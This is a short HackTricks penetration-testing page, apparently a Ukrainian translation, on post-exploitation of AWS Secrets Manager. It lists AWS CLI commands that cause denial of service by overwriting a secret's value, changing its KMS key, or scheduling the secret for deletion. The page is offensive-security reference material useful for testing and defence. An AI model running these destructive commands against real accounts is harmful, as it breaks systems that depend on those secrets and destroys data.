AWS - Secrets Manager Post Exploitation

Support HackTricks

Secrets Manager

Для отримання додаткової інформації перегляньте:

Read Secrets

секрети самі по собі є чутливою інформацією, перегляньте сторінку privesc, щоб дізнатися, як їх читати.

DoS Change Secret Value

Змінивши значення секрету, ви можете DoS усю систему, яка залежить від цього значення.

Зверніть увагу, що попередні значення також зберігаються, тому легко просто повернутися до попереднього значення.

# Requires permission secretsmanager:PutSecretValue
aws secretsmanager put-secret-value \
--secret-id MyTestSecret \
--secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}"

DoS Зміна ключа KMS

aws secretsmanager update-secret \
--secret-id MyTestSecret \
--kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE

DoS Видалення Секрету

Мінімальна кількість днів для видалення секрету - 7

aws secretsmanager delete-secret \
--secret-id MyTestSecret \
--recovery-window-in-days 7
Підтримайте HackTricks

Last updated